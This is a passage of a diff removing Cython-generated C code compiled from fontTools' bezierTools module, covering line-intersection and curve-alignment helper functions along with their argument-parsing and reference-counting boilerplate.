pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - * ) - */ - __pyx_t_2 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_empty_tuple, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1218, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1217 - * pt, e1, s1 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): - * return [ # <<<<<<<<<<<<<< - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - */ - __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1217, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); 
- __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_3, 0, __pyx_t_2)) __PYX_ERR(0, 1217, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1214 - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) - * if _both_points_are_on_same_side_of_origin( # <<<<<<<<<<<<<< - * pt, e1, s1 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): - */ - } - - /* "fontTools/misc/bezierTools.py":1222 - * ) - * ] - * return [] # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_3 = PyList_New(0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1222, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1147 - * - * - * def lineLineIntersections(s1, e1, s2, e2): # <<<<<<<<<<<<<< - * """Finds intersections between two line segments. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_XDECREF(__pyx_t_10); - __Pyx_AddTraceback("fontTools.misc.bezierTools.lineLineIntersections", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_s1x); - __Pyx_XDECREF(__pyx_v_s1y); - __Pyx_XDECREF(__pyx_v_e1x); - __Pyx_XDECREF(__pyx_v_e1y); - __Pyx_XDECREF(__pyx_v_s2x); - __Pyx_XDECREF(__pyx_v_s2y); - __Pyx_XDECREF(__pyx_v_e2x); - __Pyx_XDECREF(__pyx_v_e2y); - __Pyx_XDECREF(__pyx_v_x); - __Pyx_XDECREF(__pyx_v_slope34); - __Pyx_XDECREF(__pyx_v_y); - __Pyx_XDECREF(__pyx_v_pt); - __Pyx_XDECREF(__pyx_v_slope12); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1225 - * - * - * def _alignment_transformation(segment): # <<<<<<<<<<<<<< - * # Returns a transformation which aligns a segment horizontally at the - * # origin. 
Apply this transformation to curves and root-find to find - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_75_alignment_transformation(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_74_alignment_transformation, "_alignment_transformation(segment)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_75_alignment_transformation = {"_alignment_transformation", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_75_alignment_transformation, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_74_alignment_transformation}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_75_alignment_transformation(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_segment = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[1] = {0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_alignment_transformation (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_segment,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - 
CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_segment)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1225, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_alignment_transformation") < 0)) __PYX_ERR(0, 1225, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 1)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - } - __pyx_v_segment = values[0]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_alignment_transformation", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 1225, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._alignment_transformation", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_74_alignment_transformation(__pyx_self, __pyx_v_segment); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject 
*__pyx_pf_9fontTools_4misc_11bezierTools_74_alignment_transformation(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_segment) { - PyObject *__pyx_v_start = NULL; - PyObject *__pyx_v_end = NULL; - PyObject *__pyx_v_angle = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_t_7; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_alignment_transformation", 1); - - /* "fontTools/misc/bezierTools.py":1229 - * # origin. Apply this transformation to curves and root-find to find - * # intersections with the segment. - * start = segment[0] # <<<<<<<<<<<<<< - * end = segment[-1] - * angle = math.atan2(end[1] - start[1], end[0] - start[0]) - */ - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_segment, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1229, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_start = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1230 - * # intersections with the segment. 
- * start = segment[0] - * end = segment[-1] # <<<<<<<<<<<<<< - * angle = math.atan2(end[1] - start[1], end[0] - start[0]) - * return Identity.rotate(-angle).translate(-start[0], -start[1]) - */ - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_segment, -1L, long, 1, __Pyx_PyInt_From_long, 0, 1, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1230, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_end = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1231 - * start = segment[0] - * end = segment[-1] - * angle = math.atan2(end[1] - start[1], end[0] - start[0]) # <<<<<<<<<<<<<< - * return Identity.rotate(-angle).translate(-start[0], -start[1]) - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_math); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_atan2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_end, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_start, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = PyNumber_Subtract(__pyx_t_2, __pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_end, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_start, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_6 = PyNumber_Subtract(__pyx_t_4, 
__pyx_t_2); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = NULL; - __pyx_t_7 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_7 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_2, __pyx_t_5, __pyx_t_6}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_7, 2+__pyx_t_7); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_v_angle = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1232 - * end = segment[-1] - * angle = math.atan2(end[1] - start[1], end[0] - start[0]) - * return Identity.rotate(-angle).translate(-start[0], -start[1]) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_Identity); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_6, __pyx_n_s_rotate); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_6 = PyNumber_Negative(__pyx_v_angle); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_2 = NULL; - __pyx_t_7 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_5))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_5); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); - 
__Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_5, function); - __pyx_t_7 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_2, __pyx_t_6}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_7, 1+__pyx_t_7); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } - __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_translate); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_start, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = PyNumber_Negative(__pyx_t_3); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_start, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyNumber_Negative(__pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_7 = 0; - #if CYTHON_UNPACK_METHODS - if (likely(PyMethod_Check(__pyx_t_5))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_5); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_5, function); - __pyx_t_7 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_t_6, __pyx_t_2}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_7, 2+__pyx_t_7); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - 
__Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1225 - * - * - * def _alignment_transformation(segment): # <<<<<<<<<<<<<< - * # Returns a transformation which aligns a segment horizontally at the - * # origin. Apply this transformation to curves and root-find to find - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools._alignment_transformation", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_start); - __Pyx_XDECREF(__pyx_v_end); - __Pyx_XDECREF(__pyx_v_angle); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1235 - * - * - * def _curve_line_intersections_t(curve, line): # <<<<<<<<<<<<<< - * aligned_curve = _alignment_transformation(line).transformPoints(curve) - * if len(curve) == 3: - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_77_curve_line_intersections_t(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_76_curve_line_intersections_t, "_curve_line_intersections_t(curve, line)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_77_curve_line_intersections_t = {"_curve_line_intersections_t", 
(PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_77_curve_line_intersections_t, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_76_curve_line_intersections_t}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_77_curve_line_intersections_t(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_curve = 0; - PyObject *__pyx_v_line = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[2] = {0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_curve_line_intersections_t (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_curve,&__pyx_n_s_line,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_curve)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1235, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if 
(likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_line)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1235, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_curve_line_intersections_t", 1, 2, 2, 1); __PYX_ERR(0, 1235, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_curve_line_intersections_t") < 0)) __PYX_ERR(0, 1235, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 2)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - } - __pyx_v_curve = values[0]; - __pyx_v_line = values[1]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_curve_line_intersections_t", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 1235, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_line_intersections_t", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_76_curve_line_intersections_t(__pyx_self, __pyx_v_curve, __pyx_v_line); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} -static PyObject 
*__pyx_gb_9fontTools_4misc_11bezierTools_27_curve_line_intersections_t_2generator4(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value); /* proto */ - -/* "fontTools/misc/bezierTools.py":1245 - * else: - * raise ValueError("Unknown curve degree") - * return sorted(i for i in intersections if 0.0 <= i <= 1) # <<<<<<<<<<<<<< - * - * - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_27_curve_line_intersections_t_genexpr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *__pyx_cur_scope; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("genexpr", 0); - __pyx_cur_scope = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr, __pyx_empty_tuple, NULL); - if (unlikely(!__pyx_cur_scope)) { - __pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *)Py_None); - __Pyx_INCREF(Py_None); - __PYX_ERR(0, 1245, __pyx_L1_error) - } else { - __Pyx_GOTREF((PyObject *)__pyx_cur_scope); - } - __pyx_cur_scope->__pyx_genexpr_arg_0 = __pyx_genexpr_arg_0; - __Pyx_INCREF(__pyx_cur_scope->__pyx_genexpr_arg_0); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_genexpr_arg_0); - { - __pyx_CoroutineObject *gen = __Pyx_Generator_New((__pyx_coroutine_body_t) __pyx_gb_9fontTools_4misc_11bezierTools_27_curve_line_intersections_t_2generator4, NULL, (PyObject *) __pyx_cur_scope, __pyx_n_s_genexpr, __pyx_n_s_curve_line_intersections_t_loca, __pyx_n_s_fontTools_misc_bezierTools); if (unlikely(!gen)) __PYX_ERR(0, 1245, __pyx_L1_error) - __Pyx_DECREF(__pyx_cur_scope); - __Pyx_RefNannyFinishContext(); - return (PyObject 
*) gen; - } - - /* function exit code */ - __pyx_L1_error:; - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_line_intersections_t.genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __Pyx_DECREF((PyObject *)__pyx_cur_scope); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_27_curve_line_intersections_t_2generator4(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value) /* generator body */ -{ - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *__pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *)__pyx_generator->closure); - PyObject *__pyx_r = NULL; - PyObject *__pyx_t_1 = NULL; - Py_ssize_t __pyx_t_2; - PyObject *(*__pyx_t_3)(PyObject *); - PyObject *__pyx_t_4 = NULL; - int __pyx_t_5; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("genexpr", 0); - switch (__pyx_generator->resume_label) { - case 0: goto __pyx_L3_first_run; - default: /* CPython raises the right error here */ - __Pyx_RefNannyFinishContext(); - return NULL; - } - __pyx_L3_first_run:; - if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 1245, __pyx_L1_error) - __pyx_r = PyList_New(0); if (unlikely(!__pyx_r)) __PYX_ERR(0, 1245, __pyx_L1_error) - __Pyx_GOTREF(__pyx_r); - if (unlikely(!__pyx_cur_scope->__pyx_genexpr_arg_0)) { __Pyx_RaiseUnboundLocalError(".0"); __PYX_ERR(0, 1245, __pyx_L1_error) } - if (likely(PyList_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) || PyTuple_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) { - __pyx_t_1 = __pyx_cur_scope->__pyx_genexpr_arg_0; __Pyx_INCREF(__pyx_t_1); - __pyx_t_2 = 0; - __pyx_t_3 = NULL; - } else { - __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_cur_scope->__pyx_genexpr_arg_0); if (unlikely(!__pyx_t_1)) 
